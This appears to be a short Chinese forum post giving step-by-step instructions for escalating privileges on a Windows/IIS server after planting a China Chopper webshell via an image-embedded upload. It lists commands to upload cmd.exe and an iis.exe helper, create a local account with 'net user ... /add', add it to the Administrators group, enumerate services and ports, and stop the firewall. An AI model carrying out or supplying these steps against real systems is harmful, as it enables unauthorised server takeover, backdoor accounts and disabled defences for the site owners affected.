关于提权问题——菜刀

心怀天下   ·   发表于 2020-03-25 18:07:13   ·   闲聊灌水区

1.需要一个图片码配合,上传文件,成功后,打开菜刀,然后开始操作。
2.打开菜刀,点击对应的文件管理,我们随便打开一个文件,会出现权限不够的字眼。那么我们就可以提权了。
3.打开虚拟终端,输入whoami,
** 如果出现不允许,那么操作如下:
回到文件管理,选择一个文件夹,右键单击,上传文件,上传一个cdm.exe 和iis.exe,成功后再回到虚拟终端,输入whoami,一般就可以成功。

** 如果一切正常,那么操作如下:
输入 net user 用户名 密码/add (如果还是不行,可以返回到你刚才上传文件的那个目录。一般cd ../是返回上一级的意思,cd user 是进入该盘的user目录下。
这个时候的命令是:iis.exe “whoami” 就可以成功了)

一般如果 net user yyy 2435/add 没有成功,那么就用 iis.exe “net user yyy 2435/add”

查看当前用户的状态: net user yyy 或 iis.exe “net user yyy”
提权:net localgroup Administrators pig /add或iis6.exe “net localgroup Administrators pig /add”
查看服务:tasklist -svc
查看了端口和连接状态:netstat -ano
查看本机的端口号:netstat -a -n
其中listen 表示监听,ESTABLISHED 表示建立连接,CLOSE_WAIT表示对方主动关闭连接或者网络异常导致连接中断,TIME_WAIT表示我方主动调用close()断开连接
关闭防火墙:net stop sharedaccess

写了一半,突然发现自己是个弟弟,奉上一个网站https://www.cnblogs.com/dggsec/p/10126382.html 这里很详细。
https://www.cnblogs.com/milantgh/category/594436.html 这个网站也很厉害。多学习。

打赏我,让我更有动力~

0 Reply   |  Until 2020-3-25 | 1196 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.